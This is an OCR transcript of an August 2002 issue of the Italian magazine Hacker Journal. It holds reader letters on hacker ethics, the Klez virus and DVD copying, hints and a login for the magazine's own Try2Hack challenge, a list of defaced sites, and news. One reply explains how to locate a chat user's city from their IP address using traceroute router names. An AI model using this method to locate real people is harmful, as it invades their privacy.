hacker.journal.n..6

30
Quando avrete tra le mani questo numero di Hacker Journal probabilmente starete per passare il più lungo periodo dell'anno offline. Oltre a mare, sole, cuore e amore, da qualche anno per molte persone Agosto significa an- che (o soprattuto) niente computer e niente In- ternet. Certo, qualcuno ha un portatile e la li- nea telefonica anche nella casa delle vacan- ze, ma non son mica poi tanti. Tranquilli, do- po pochi giorni di crisi da astinenza, mare, so- le, cuore e amore avranno la meglio, e non sentirete più tanto la mancanza del fischio del modem, del rilassante scorrere del mouse sul tappetino e del luccichio del monitor negli oc- chi. Se così non fosse, siete davvero malati. Per i piccoli momenti di nostalgia da rete pe- rò, portatevi in vacanza questa copia di Hac- ker Journal, da gustare un po' alla volta, tra un bagno e una piadina. [email protected] HJ:intasatelenostrecaselle Ormai sapete dove e come trovarci, appena possiamo rispondiamo a tutti, anche a quelli incazzati. Parola di hacker. SCRIVETE!!! Anno 1 – N. 6 - 1 agosto/29 agosto 2002 Boss: [email protected] Publisher: [email protected] Editor: [email protected], Technical editor: [email protected] Graphic designer: Marco Ranieri Contributors: Daniele Festa (cover picture) Publishing company 4ever S.r.l. Via Torino, 51 20063 Cernusco sul Naviglio Fax +39/02.92.43.22.35 Printing Stige (Torino) Distributore Parrini & C. S.PA. - 00187 Roma - Piazza Colonna, 361- Tel. 06.69514.1 r.a./20134 Milano, via Cavriana, 14 Tel. 02.75417.1 r.a. Pubblicazione quattordicinale registrata al Tribunale di Milano il 25/03/02 con il numero 190. Direttore responsabile: Luca Sprea Gli articoli contenuti in Hacker Journal hanno uno scopo prettamente didattico e divulgativo. L’editore declina ogni responsabilità circa l’uso improprio delle “tecniche” e dei tutorial che vengono descritti al suo interno. L’invio di immagini ne autorizza implicitamente la pubblicazione gratuita su qualsiasi pubblicazione anche non della 4ever S.r.l. Copyright 4ever S.r.l. Testi, fotografie e disegni, pubblicazione anche parziale vietata. Realizzato con la collaborazione di Hacker News Magazine - Groupe Hagal Aria polizia.it webmail - www.polizia.it IT Business Weekly - www.itbussinessweeklt.it Esperia.it - http://basilicata.esperia.it Server interno di Energy - http://asp.energy.it 2 | www.hackerjournal.it hack . er (hãk’ r) “Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione e come espandere le loro capacità, a differenza di molti utenti, che preferiscono imparare solamente il minimo necessario.” Danni in rete Nuove vittime! DEFACED! DEFACED! DEFACED! DEFACED!

Upload: michael-b-vincent

Post on 12-Jun-2015

1.538 views

Category:

Documents


2 download

TRANSCRIPT

Page 1: Hacker.journal.n..6

Quando avrete tra le mani questo numero diHacker Journal probabilmente starete perpassare il più lungo periodo dell'anno offline.Oltre a mare, sole, cuore e amore, da qualcheanno per molte persone Agosto significa an-che (o soprattuto) niente computer e niente In-ternet. Certo, qualcuno ha un portatile e la li-nea telefonica anche nella casa delle vacan-ze, ma non son mica poi tanti. Tranquilli, do-po pochi giorni di crisi da astinenza, mare, so-le, cuore e amore avranno la meglio, e nonsentirete più tanto la mancanza del fischio delmodem, del rilassante scorrere del mouse sultappetino e del luccichio del monitor negli oc-chi. Se così non fosse, siete davvero malati.Per i piccoli momenti di nostalgia da rete pe-rò, portatevi in vacanza questa copia di Hac-ker Journal, da gustare un po' alla volta, traun bagno e una piadina.

[email protected]

HJ: intasate le nostre caselleOrmai sapete dove e come trovarci, appenapossiamo rispondiamo a tutti, anche a quelliincazzati. Parola di hacker. SCRIVETE!!!

Anno 1 – N. 6 - 1 agosto/29 agosto 2002

Boss: [email protected]

Publisher: [email protected]: [email protected],

Technical editor: [email protected]

Graphic designer: Marco RanieriContributors: Daniele Festa (cover picture)

Publishing company4ever S.r.l.

Via Torino, 51

20063 Cernusco sul Naviglio

Fax +39/02.92.43.22.35

PrintingStige (Torino)

DistributoreParrini & C. S.PA. - 00187 Roma - Piazza

Colonna, 361- Tel. 06.69514.1 r.a./20134

Milano, via Cavriana, 14

Tel. 02.75417.1 r.a.

Pubblicazione quattordicinale registrata

al Tribunale di Milano il 25/03/02

con il numero 190.

Direttore responsabile: Luca Sprea

Gli articoli contenuti in Hacker Journal

hanno uno scopo prettamente didattico

e divulgativo. L’editore declina ogni

responsabilità circa l’uso improprio

delle “tecniche” e dei tutorial

che vengono descritti al suo interno.

L’invio di immagini ne autorizza

implicitamente la pubblicazione gratuita

su qualsiasi pubblicazione anche non

della 4ever S.r.l.

Copyright 4ever S.r.l.Testi, fotografie e disegni,

pubblicazione anche parziale vietata.

Realizzato con la collaborazione di

Hacker News Magazine - Groupe Hagal Aria polizia.it webmail - www.polizia.it

IT Business Weekly - www.itbussinessweeklt.it

Esperia.it - http://basilicata.esperia.it

Server interno di Energy - http://asp.energy.it

2 | www.hackerjournal.it

hack.er (hãk’∂r)

“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione e come espandere le loro capacità, a differenza di molti utenti, che preferisconoimparare solamente il minimo necessario.”

Danni in reteNuove vittime!

DEFACED!

DEFACED!

DEFACED!

DEFACED!

Page 2: Hacker.journal.n..6

www.hackerjournal.it |3

Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac-king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si faper dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo diHacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co-mincia), MIDHACKING (per chi c’è già dentro) e HARDHACKING (per chi man-gia pane e worm).

UN GIORNALE PER TUTTI: SIETE NEWBIE O VERI HACKERS?

Questo spazio è vostro!Approfittatene, e fate lavorare quella tastiera!

OPEN SOURCE

Salve HJ,vi scrivo a proposito del-

la lettera da voi pubbli-cata sul numero 5 dalt i to lo “La s i curezza,una toppa alla volta”.Credo che, nello spiri-to hacker, tale letterasia un isulto alla fi lo-

sof ia che accomuna “ iveri hacker”. Almeno si

contrappone alla f i losofiadegli hacker definita nel “jar-

gon file”, universalmente riconosciutacome “bibbia degli hacker”.Se l’autore della mail pubblicata vuo-le essere un hacker avrebbe dovutosegnalare il buco ai webmaster o agliamminis trator i del s is tema, questosempre secondo il jargon file. Il fattodi non averlo fatto e, anzi, averne ap-prof i t tato inv iando (secondo quel loche scrive) 50.000 messaggi ne fa uncracker e del la peggiore spec ie . Setutti rispettassimo un po’ più le rego-le, le aziende che mettevano a dispo-sizione i servivi gratuiti, come gli SMSvia internet , forse avrebbero cont i-nuato a farlo (anche se ne dubito... maquesta è un’altra storia).Ma non è per questo che vi scrivo, noncredo non ci sia nulla di male per unapersona trovare una falla in qualches i to e approf i t tarne, vantandonesecon gli amici per fare il f igo. Sempli-cemente quella persona non è un hac-ker. Avreste, se vi ritenete una rivistaper hacker, dovuto sottolinearlo, IM-HO naturalmente. Criticare pubblica-mente un sistema e non parlarne di-rettamente con i responsabili non gio-va a nessuno, prima fra tutti alla co-muni tà hacker che già gode di unapess ima reputazione nel l ’opinionepubblica. Se vi ritenete una rivista chevuole far conoscere al pubblico lo spi-rito trainante degli hacker, con questaemail avete, sempre IMHO, fallito mi-

seramente. Cambiando pagina, nellostesso numero, altra mail: “Nel pro-fondo blu”. Viene evidenziato un pas-saggio: “...pensano agli hacker comedelinquenti, che loro usano queste sfi-de solo perché vogliono fare qualcosadi diverso e per dimostrare al mondointero che niente è veramente sicurocome si dice”. In piena contrapposi-zione con la mail della pagina prece-dente. Non mi sembra che HCS!elKapoabbia voluto dimostrare al tro che i lfatto di aver potuto inviare a “sbafo”50*10^3 (cito testualmente) messaggiSMS, se questo non è delinquere... Al-tra pagina... credo che sia ottima larisposta data nella mail “Ah, dottoredottore”, in vero spirito hacker... ma,se la pensate davvero così sul softwa-re come mai ci sono i l ink ad astalavi-s ta sul l ’ar i t co lo “Ef fet t i spec ia l i? L ifaccio io” pagina 26 numero 3, con unparagrafo dal titolo “Se li volete gra-tuiti”? Un po’ di coerenza non farebbemale... sempre IMHO. Forse chi scrivegli articoli e chi risponde alle mail lapensano in modo un po’ troppo diver-samente, credo dobbiate rivedere unpo’ la vostra linea etica, IMHO. Certo,se diventate una rivista per “hacker”cos ì come indicato nel jargon f i le ,mol t i scr ipt k iddie , che tanto sonomaltrattati a parole nella vostra rivi-sta, ma tanto rifocillati da link util i dadove scaricare Warez e exploi t , noncompreranno più la vostra rivista, for-zandovi a dover introdurre la pubbli-cità (tanto odiata, anche se non capi-sco perché? tanto non credo che Mi-crosoft o Symantech vorrebbero farela pubbl ic i tà sul la vostra r iv is ta. . . ) .Almeno però ci sarebbe un po’ più dicoerenza tra quello che vi proponetedi fare e cosa alla fine invece fate.Inul t ima anal is i , seguire i i l cons ig l iodatovi dalla lettrice Irene108 sempresul numero 5 , cambiate i l nome in“cracker journal” credo avrete ancora

più let tor i e almeno non dovete far“finta” di voler promuovere lo spiritohacker, che a mio avviso continuate,non sempre ma spesso, ad infanga-re. . . se sul la pagina numero due diogni numero ci sono i siti defacciati,come diavolo volete che la gente pen-s i bene degl i hacker???? Ma quest isono solo pensieri di un vecchio geektrentenne, capisco che la rivista non sir ivolge a persone come me, infat t iquando qualcuno mi chiede perchécompro la vostra rivista gli rispondo“per combattere il nemico bisogna co-noscerlo.. .”.

E2ule5

Come abbiamo già avuto modo di dire,Hacker Journal ha aperto una finestradi carta su un mondo, quello dell’hac-king, che ha le sue contraddizioni e lesue divis ioni . È abbastanza normalequindi che la rivista rifletta in partetutto questo. Certo, una linea editoria-le ce l’ha, ed è quella che puoi legge-re nelle risposte e negli articoli. Perquanto riguarda le lettere, noi pubbli-chiamo quelle che stimolano riflessio-ni, come quella del numero scorso cheti ha tanto colpito. E pubblichiamo vo-lentieri la tua, sperando che faccia ri-f let tere qualcuno, che c i scr iverà lasua interpretazione che genererà. . .eccetera. Questa è una piazza dove sifanno r i f less ioni pubbl iche, dove lepersone possano formarsi un’opinio-ne, cambiare punto di vista, e magaripassare da una parte all’altra. Forsequalcuno che comincia con gli exploitsi rende conto che non è poi ‘sta grancosa, e gli viene voglia di diventareun hacker vero. Se però etichettiamosubi to buoni e cat t iv i , dec idendo diparlare solo ai primi, perdiamo tuttiquesta possibilità.. . .Ah, secondo me HCS!elKapo stavaun po’ esagerando quando parlava di50*10^3 SMS.

OPEN SOURCE

Poca coerenza?

Saremo

di nuovo

in edicola

Giovedì

29° agosto!

Page 3: Hacker.journal.n..6

4 | www.hackerjournal.it

www.hackerjournal.it

COMPILATORI GRATIS

Sono un appassionato (inesperto)di programmazione Object Ori-

ented, e ho bisogno di un vostroconsiglio: mi sapreste indicare unsito (sicuro) da cui scaricare gratui-tamente un buon editor (provvistodi compilatore) per i l l inguaggioC/C++? Ve ne sarei infinitamentegrato! Tenete però presente che uti-lizzo come SO Windows 98 e ME!So che dovrei passare a Linux, maqui sorge un secondo problema: hoappena installato su una partizionedel mio hard disk la distro 8.2 diMandrake, ma non appena questaentra nella schermata iniziale il mio(piut tosto vecchio) monitor v ienemesso in stand-by! È possibile risol-vere anche questo problema? Gra-zie!

Christi@n

Alcuni vecchi compilatori Borlandsono ora gratuiti! Non saranno i piùaggiornati, ma sono affidabili, do-cumentati e gratuiti. Li puoi trovareall’indirizzo: http://community.borland.com/mu-seum Per scaricarli è necessaria unaregistrazione gratuita. Per quanto riguarda il malfunziona-mento del monitor con la Mandrake,

mailto:[email protected]

CREW IN CERCA DI NUOVI MEMBRI

Salve,vi abbiamo già scrit to per farvi icomplimenti sul fatto che miglioratein ogni nuovo numero, questa voltaper chiedervi di inserire l’indirizzodella Crew su HJ.Vi chiediamo di inserire il link perchéstiamo cercando nuovi membri enuovi collaboratori per completarealcune sezioni del sito.Il sito non è ancora on-line, ma cmql’indirizzo è www.epochcrew.cjb.netl’e-mail per chi volesse parteciaparealla creazione del sito è [email protected].

a occhio sembrerebbe trattarsi di unproblema di conf igurazione diXFree86, che probabilmente cercadi impostare una risoluzione o unafrequenza di refresh non supportatedal monitor. Senza poterci metterele mani sopra, è è però difficile farediagnosi affidabili. Mi spiace, nonriesco ad aiutarti di più.

SECRET ZONE PIÙ RICCA!

Ciao sono dArKcLoWn, volevochiederevi di prendere almeno

in considerazione questa mia pro-posta: perché non usate la secretzone come fonte principale dei no-stri tanti richiesti corsi di linguaggidi programmazione E il giornale lolasciamo com’è. Scommetto che ilettori aumenteranno notevolmente.

¥dArKcLoWn¥

Come forse avrei visto, la secret zo-ne del sito è sempre più ricca, e ineffetti già pensavamo di spostare lìalcuni degli articoli che non trovanoposto nella r ivista. Probabilmenteper quanto riguarda la programma-zione, lasceremo sul giornale le

parti più generali e discorsive, men-tre metteremo sul sito gli esempi dicodice, così si possono scaricare ocopiare senza dover l i t rascr ivere(con in più il rischio di errori).

CANOTTIERE E CELLULARI

Salve ragazzi, vi scrivo questa e-mail per farvi una domanda e

una richiesta. Perché il pupazzo di-segnato nella 4 copertina del gior-

nale ha i l segnodel la abbronza-tura della canot-t iera???Non èche potete accen-nare come trova-re la posizione diun cel lu lare? Viallego un teschioin Ascii.

septar

Io quando non trovo la posizionedel mio telefonino faccio così: coltelefono di casa compongo il nume-ro del cellulare, e poi cerco di loca-lizzarlo seguendo la suoneria. Ge-neralmente lo trovo sotto ai cuscini

Continuate a mandarci le vostre immagini: questa è di FXM (Gianni),che ha esagerato un po’, mandando un Tiff da 10 Mega. (Gianni, unJpeg per questo tipo di cose va benissimo, e pesa mooolto meno).

Page 4: Hacker.journal.n..6

www.hackerjournal.it |5

NOPUBBLICITÀ

STAMPA

LIBERA

SOLO INFORMAZIONI

E ARTICOLI SOLO INFORMAZIONI

E ARTICOLI

STAMPA

LIBERASaremo

di nuovo

in edicola

Giovedì

29° agosto!

del divano. O dentro a un calzino.Ma forse non era questo che vole-vi sapere.. . : -DPiù ser iamente, un ce l lu lare puòessere local izzato molto faci lmen-te dal gestore e dalle forze di po-l iz ia. Per un pr ivato impl ica unosforzo molto grande e l ’ut i l izzo diapparecchi e tecniche vietate. Per quanto r iguarda la canott iera,nei primi bozzett i i l personaggio ineffett i la indossava. Poi abbiamo

deciso di lasciar lo a torso nudo,ma non ci s iamo accort i che i l gra-f i co aveva lasc ia to i l computerespos to a l so le . I l g io rno dopo,quando la r iv ista era già in stam-pa, sono comparsi i segni del l ’ab-bronzatura. Non t i preoccupare: se r iguardi lacopert ina verso ot tobre, sarannoprobabilmente sparit i . E per fortu-na che qualche r iga sopra avevoscri t to “scherzi a parte”.

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI

TOLLERANZA E PASSWORD

“Ogni individuo, per quanto ti possasembrare più scemo o più intelligen-te di te, più buono o più cattivo, piùgiusto o più ingiusto, più onesto opiù bugiardo, più “antico” o più mo-derno, più ignorante o più colto e,perfino, identico a te, ha semprequalcosa di importante da comuni-carti. Puoi condividerla o contestarlama solo dopo averla ascoltato. Altri-

LIVELLO 4Non è difficile capire il linguaggiocon cui è realizzata la protezione dellivello 4: Java. Da qualche parte neifile temporanei dovreste quindi tro-vare un file che ha a che fare conl'applet in questione. Buon lavoro.

LIVELLO 5Il livello 5 funziona con un program-ma scritto in Visual Basic. Le tracce egli indizi andranno trovati all'inter-no del programma, dopo averlo de-compilato. Cercate la sezione relati-va all'autenticazione e... lavorate difantasia.

LIVELLO 6Anche il livello 6 utilizza un pro-gramma in Visual Basic, ma non èpossibile decompilarlo. Bisogneràquindi cercare di intuire qualcosadel suo funzionamento osservandotutto quello che il programma fa al-le nostre spalle (a quale server sicollega e cosa si dicono i due).

TRY2HACK:METTETE ALLAPROVA LA VOSTRA ABILITÀ

A parole siete tutti bravi, ma riuscite ve-ramente a passare dei livelli di protezio-ne? Dimostratelo al mondo e a voi stessicercando di superare i dieci livelli di dif-ficoltà del giochino Try2Hack (che si leg-ge "try to hack"), presente sul nostro sitowww.hackerjournal.it. Il gioco consiste nel superare i vari livel-li, inserendo ogni volta le password cor-rette (oppure arrivando in altri modi allepagine protette da password). Per farlo, potreste avere bisogno di alcu-ni programmi (Macromedia Flash, Softi-ce, VisualBasic). Di tanto in tanto qualche lettore ci scriveper dire che alcuni livelli sembrano nonfunzionanare. Noi vi possiamo assicura-re invece che tutti quanti funzionanoesattamente come dovrebbero. Chi ha orecchie per intendere...

Nuova password!!!Ecco i codici per accedere alla Secret Zonedel nostro sito, dove troverete informazionie strumenti interessanti. Con alcuni browser,potrebbe capitare di dover inserire due vol-te gli stessi codici. Non fermatevi al primotentativo.

user: frastpass: uoni9

Try2Hack, fate vedere di che pasta siete fatti!

gh Scores - High Scores - High Scores - Hig

Mandateci una mail a: [email protected] il numero del livello a cui siete arrivati e le pas-sword di tutti i livelli precedenti. Sui prossimi numeri pubbli-cheremo l’elenco dei migliori.

Page 5: Hacker.journal.n..6

6 | www.hackerjournal.it

by bye

www.hackerjournal.it

menti, resta in silenzio!” È un miomodo di pensare che stasera ho tra-dotto in parole per voi (la frase so-pra è mia, giuro!), riflettendo sui proe i contro delle critiche verso HackerJournal che ho letto fin dai primi nu-meri (ARGGGHH! mi sono perso iln.3 - colpa dell’uscita quindicinale).Forse non condivido tutto quello chefanno gli hackers (forse, perché de-vo capire ancora bene cosa vera-mente fanno) però mi appassional’idea di poter conoscere qualcunonuovo, e ascoltare la cosa importan-te che ha da proporre.In bocca al lupo.P.S.: ma con sta password per acce-dere all’area segreta (ovvero di tuttiquelli che “accattano ‘o giurnale”)quando ci azzeccate? Ho provatoma niente: fosse che fosse un po’sbagliata? (magari appositamenteper creare un po’ di suspance???!!)E non scrivetemi che un hacker lapassword se la cerca da sola: se erogià un hacker non mi compravo ilgiornale per diventarlo (magari perprovarci).Have a nice night

Rafolino[RAF]

Per quanto riguarda la password, noil’abbiamo sempre azzeccata. A nonazzeccarla a volte sono stati i lettori,che spesso e volentieri confondevanol (elle) con 1 (uno) o 0 (zero) con O(vocale o). Per tagliare la testa al to-ro, abbiamo deciso di non utilizzarepiù caratteri ambigui nello sceglierele nuove password. Precisiamo anco-ra una volta che, quando esce il nuo-vo numero della rivista, le passwordassociate al vecchio numero cessanodi funzionare.

LA MADRE DEI LAMER È SEMPRE INCINTA

Mi presento: mi chiamo Francesco“Squalo”, ho 27 anni e vivo a

Latina. Oggi, in una sperduta edico-la della mia città, ho trovato il n.3della vs rivista. Inizialmente ho pen-sato ad un nome ingannevole ma,sfogliandola, ho scoperto che il no-me era coerente con il contenuto. E

non posso che farvi i complimenti!!!Premetto che non sono un hacker (o,almeno, vorrei averne le capacità ele conoscenze per esserlo... :P), maho iniziato ad interessarmi a questo“mondo” già da parecchi anni. Ini-zialmente con profondo odio versola categoria per diversi attacchi e vi-rus ricevuti nei primi anni di connes-sione in rete. Con il tempo ho capitoche, certi attacchi devono essere di-stinti tra idioti che non hanno nienteda fare di meglio che incasinare lavita in rete di semplici ed innocuiutenti e veri e propri professionistiche hanno fatto delle loro conoscen-ze, una vera e propria arte. Ho “tifa-to” gli attacchi contro siti pedofili,contro lo strapotere (ed anti-privacy)della Microsoft, etc... Ora so distin-guere le categorie e comprendereche gli idioti sono ovunque. E sonofelice che finalmente ci sia anche unposto per questi argomenti fra letante riviste in edicola. Mi chiedevose fosse possibile reperire i primi 2numeri che mi sono sfuggiti, perchèho deciso di diventare un vostro let-tore abituale.

Francesco “Squalo”

Tieni comunque presente che attac-care il server di un altro è un reato,anche se questo è “cattivo”. E per dipiù spesso non serve a niente. Se in-vece di attaccare frontalmente e bru-talmente i server Web di Microsoft lagente si impegnasse a dimostrarneteoricamente le vulnerabilità e a pro-pagandare le soluzioni alternative(software libero sopra tutte), il dan-no per Microsoft sarebbe molto mag-

Ghent e Fimietta propongono di sostituire la testa-ta di Hacker Journal con questa immagine moltocarina ma, secondo me, un po’ troppo complessacome testata. Voi che ne pensate?

giore di un semplice attacco, che tral’altro sanno benissimo come contra-stare). Per quanto riguarda gli arre-trati, puoi scaricarli dal sito in for-mato PDF. Da questo mese sono sta-ti spostati nella secret zone, allaquale si accede con la password chetrovi sulla rivista.

VIRUS SU MAC

Cari amici, volevo sottoporvi que-sto problema: Premetto che uso

Mac OS 9.0.4 e so che il virus di cuiparlo non attacca questo sistema.Penso di aver beccato un virus delceppo Klez perché sono soggetto aquello che gli esperti chiamanospoofing (qualcuno o qualcosa stausando il mio indirizzo di posta elet-tronica per spedire e-mail a perso-ne che non conosco e a cui non hospedito niente).Contemporaneamente ho tre proble-mi sulla macchina:1 - non riesco più ad aprire i file jpg(messaggio :”non trovo un importa-tore grafico appropriato”) adopero

Arretrati e abbonamentiSiete in tanti a chiederci se sia possibile ab-bonarsi o richiedere i numeri arretrati diHacker Journal, che ormai stanno diventan-do oggetti da collezione. Stiamo cercando diallestire le strutture necessarie, ma potreb-be essere necessario un po' di tempo. Intan-to, potete trovare i PDF di tutti i vecchi nu-meri sul sito nella Secret Zone, e già che sie-te sul sito, iscrivetevi alla nostra mailing list:sarete avvisati non appena i servizi abbo-namenti e arretrati saranno disponibili.

Page 6: Hacker.journal.n..6

www.hackerjournal.it |7

NOPUBBLICITÀ

STAMPA

LIBERA

SOLO INFORMAZIONI

E ARTICOLI SOLO INFORMAZIONI

E ARTICOLI

utenti degli indirizzi tipo: lineamo-dem56-padova.dialup.provider.itAnche senza un indirizzo “eloquen-te” come questo, avendo l’indirizzoIP dell’utente è possibile effettuareun traceroute e vedere se i nomi deirouter intermedi rivelano qualcosa.Per esempio, si può ottenere qualco-sa di questo tipo (abbiamo tagliato itempi di risposta dal traceroute edeliminato le prime e le ultime righeper riservatezza...):

2 host149-10.pool217141.interbusiness.it3 r-mi225-vl10.opb.interbusiness.it4 r-mi225-mi258.opb.interbusiness.it5 r-rm258-mi213.opb.interbusiness.it6 r-rm213-fi63.opb.interbusiness.it7 r-fi63-fi67.opb.interbusiness.it8 r-fi41-vl19.opb.interbusiness.it9 host198-238.pool21759.interbusiness.it10 gw1-hssi0.dada.it

Si può vedere che la connessioneparte da un nodo di Milano (riga 3,r-mi225-vl10...), si sposta su Roma(riga 5, rm258-mi213...) per poi ter-minare dalle parti di Firenze (dalla

riga 7 in poi, r-fi63-fi67...)prima di arrivare al providera cui è collegato l’utente(dada.it). Si può dedurrequindi che l’utente è colle-gato a un nodo Dada di Fi-renze.Ancora più facilmente, i ltutto può essere fatto usan-do un’utility grafica comeVisual Route (www.visual-

route.com) o Neo Trace (www.mca-fee.com/myapps/neoworx), che mo-strano su una cartina geografica ilpercorso della connessione. Conquesti dati è possibile ottenere ulte-riori informazioni (indirizzo e numerodi telefono), ma solo se si ha acces-so ai dati r iservati del provider.Quest’ult imo è tenuto a custodiredati di questo tipo con molte atten-zioni, e li comunica solo alle forze dipol iz ia dopo l’autorizzazione delGiudice per le Indagini Preliminari.Sostanzialmente, secondo me il tuoamico era un lamerone che le spara-va un po’ grosse.

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI

STAMPA

LIBERASaremo

di nuovo

in edicola

Giovedì

29° agosto!

Adobe Photoshop.2 - sono spariti tutti i preferiti dalBrowser (MS Explorer 5 + OutlookExpress 5.0.1)3 - quando apro il centro aiuti delMac il testo è sparito , compare so-lo questa scritta “run in Dos mode$PELLoo1E7#......”.Sulla macchina ho anche Virtual PC2.0.1. Cosa ne pensate?

Ragy

Klez non attacca i Macintosh, ma èdannoso anche per gli utenti dellamela. La vera vittima del virus è pro-babilmente un tuo amico o cono-scente che usa Outlook per Windowse ha il tuo nome nella rubrica deicontatti. Klez infatti prende a casoindirizzi dalla rubrica della vittima eli usa come “mittente” delle emailcon le quali si propaga (per farlonon servono tecniche particolari, eparlare di spoofing è quanto menoesagerato). Gli altri problemi che ci-ti sono però effettivamente sospetti.Soprattutto quello relativo al CentroAiuti. Anche se i virus Mac sono mol-to rari, mi procurerei un buon antivi-rus aggiornato e farei una bellascansione!

DVD SU CD: COME?

Dopo aver acquistato il n°4 delgiornale, ho provato ha fare la

conversione del DVD. Ho fatto tuttele operazione spiegate sul giornalee ho finito la conversione dopo 1orae 44 minuti. Dopo aver aperto il fi-le convertito, si apre Windows Me-dia Player e vedo il film. Io vorreitanto sapere (e spero che lo spie-gherete sul pross. num.) come fac-cio con il programma di masterizza-zione che ho (Easy cd creator) ametterlo sul CD-R? Può sembrareuna domanda stupida ma mi serveun aiuto!!!! GRAZIE

Shaddix86

Se vuoi semplicemente rivederlo sulPC, basta che copi il file sul CD co-me se si trattasse di un documentoqualsiasi. Quando vorrai rivederlo,basterà aprire quel file con il pro-

gramma che usi per i filmati. Se inve-ce vuoi farne un Video CD, che puòessere visualizzato anche su un tele-visore con un lettore di DVD, le cosesi complicano un po’. I Video-CD in-fatti non possono contenere file co-dificati con Div-X, ma devono esseredi t ipo Mpeg-1, con impostazioniparticolari. Trovi tutte le informazio-ni per creare Video CD con Easy CDCreator partendo da file Avi o Quick-Time sul sito www.roxio.com/en/sup-port /roxio_support/ecdc/video_im-pression.html

CHAT E PARANOIA

Vi chiedo un aiuto, spero di riceve-re una vostra email al + presto:

alcune sere fa stavo chattando inwww.actionchat.com e, mentre par-lavo, la persona dall’altra parte è ri-uscita a risalire al mio ip e quindi miha detto anche la città da dove chat-tavo. Inoltre mi ha spiegato cheavrebbe potuto anche venire a cono-scenza del mio indirizzo e del nume-ro di telefono. È possibile tutto ciò?devo temere qualcosa? Come hafatto a sapere il mio ip e la miacittà? Navigo conun provider tipo li-bero o altro quindicon ip dinamico,cosa altro devo te-mere? Scusate lamia ignoranza epreoccupazione, manon vorrei averesgradite sorprese... In definitiva: è possi-bile scoprire tutte queste cose di unpartecipante a una chat? E se si, co-me si fa?

Giovanni

Risalire al numero IP di un parteci-pante a una chat è in genere moltosemplice, anche se varia in base alsistema di chat utilizzato (Irc, Icq,chat in Java sui siti Web...). Moltiprovider poi, e particolarmente quel-li più grandi, hanno un sistema di in-dirizzi che rivela parecchie informa-zioni della persona che si collega. Li-bero per esempio assegna ai propri

Page 7: Hacker.journal.n..6

news

8 | www.hackerjournal.it

HOT! ! APPLE TRA APPLAUSI E FISCHI

Durante il Macworld Expo di New York, il CEOdi Apple Steve Jobs ha fatto il tradizionale

bagno di folla. Questa volta però, accanto alleacclamazioni, qualcuno degli utenti più fedeli èrimasto parecchio scontento da alcune delle no-vità. Tra le notizie positive c�è stato senz�altroMac OS X 10.2 (noto come Jaguar), aggiorna-mento che migliora grandemente le funzionalitàdel sistema, il nuovo lettore di Mp3 iPod da 20Gbyte, gli iMac con schermo Lcd da 17� e unanuova serie di applicazioni gratuite che permet-teranno di centralizzare la gestione di contatti eappuntamenti, permettendo una facile sincroniz-zazione con palmari e cellulari. Due notizie hanno però deluso gli appassionati.La prima novità è che per l�acquisto di Jaguarnon ci sarà nessuna versione �aggiornamento�,gli attuali utenti di Mac OS X dovranno pagare

139 euro più Iva cometutti gli altri. La secondanota negativa èl�annuncio che i serviziiTools finora gratuiti(posta elettronica conindirizzo @mac.com,spazio per home page epubblicazione di fotoonline e un discovirtuale da 25 Mbyte),da ora in poi sarannosolo a pagamento. Afronte di un aumentodelle caratteristiche delservizio (100 Mbyte dispazio per sito e discoinvece di 25, 15 Mbyteinvece di 5 per la posta,e l�inclusione nel

pacchetto di software antivirus e di backup),gli utenti dovranno sborsare poco meno di 100dollari l�anno. Anche se non si tratta del primoservizio gratuito che diventa a pagamento, gliutenti sono particolarmente arrabbiati perché,quando Steve Jobs ha annunciato iTools per laprima volta, aveva parlato di �indirizzo email avita�, e questa affermazione era stata ancheutilizzata come arma pubblicitaria. Al solito, accanto a chi sa solo lamentarsi c�èanche chi si organizza per superare ledifficoltà, magari sfruttando le potenzialità diInternet. Lo staff del Powerbook Owners Club(www.poc.it) ha deciso di offriregratuitamente a tutti i suoi soci un indirizzo diposta con suffisso @poc.it, e hosting sul sitodel club, con caratteristiche diverse a secondadel tipo di socio (ordinario o sostenitore). K

C&A, azienda con sede a Milano, ha annunciato il lancio diSignStation: un software per Windows accenntra le opera-

zioni relative alla firma digitale e crittografia per tutti i formati difile nel rispetto della legge italiana. SignStation gestisce firmemultiple mantenendo traccia dei firmatari e della marcatura tem-porale delle firme. Questo permette di tenere una traccia certifi-cata delle modifiche a un file. Applicando la crittografia multiplaè possibile cifrare un documento per condividerlo con un speci-fico gruppo di persone in un unico passaggio. SignStation e giàdisponibile e lo si può scaricare da Internet direttamente dal si-to della C&A (www.com-and.com). K

�IN MEDIA STAT VIRUS�> anonimo bulgaro?

! METTIAMOCI UNA FIRMA

! USA: ERGASTOLOPER I CRACKER

I l primo ramo del parlamento americano haapprovato la legge Cyber Security Enhan-

cement Act (CSEA), che inasprisce le peneper i reati di tipo informatico e permette alleforze di polizia di realizzare intercettazioni In-ternet o telefoniche senza bisogno di auto-rizzazioni da parte del tribunale. L�incredibile provvedimento era già statopreparato prima dell�11 settembre, ma finoal giorno degli attacchi terroristici di NewYork e Washington aveva parecchi avversa-ri, primi tra tutti i deputati più sensibili versoi temi legati alla privacy e ai diritti civili. Orainvece la legge è passata con una maggio-ranza schiacciante (385 voti a favore e solo3 contrari). Il CSEA permetterà ai tribunalipersino di infliggere la pena dell�ergastolo aquei cracker che, con le loro azioni, mette-ranno in pericolo la vita di altre persone. Leintercettazioni potranno essere effettuatesenza autorizzazione per motivi di urgenza(per esempio durante un attacco) o di estre-ma gravità (casi di sicurezza nazionale o ri-schio per l�incolumità delle persone), ma do-vranno essere limitate all�ottenimento dellecoordinate della persona sorvegliata (indiriz-zo IP, email o numero di telefono); senza au-torizzazione non sarà possibile controllare ilcontenuto di telefonate e connessioni Inter-net. Una curiosità: tra le altre cose previstedalla legge, diventerà vietato pubblicizzareon-line qualsiasi �apprecchio eletronico disorveglianza� (il divieto era finora relativosolo alla pubblicità stampata su carta). Pro-babilmente il governo americano è convintoche Bin Laden si procuri i propri strumention-line, pagando con carta di credito e fa-cendosi recapitare il tutto a casa! Se non al-tro sarà la fine dei noiosissimi pop-up del-la telecamerina X-11... K

Page 8: Hacker.journal.n..6

www.hackerjournal.it | 9

news

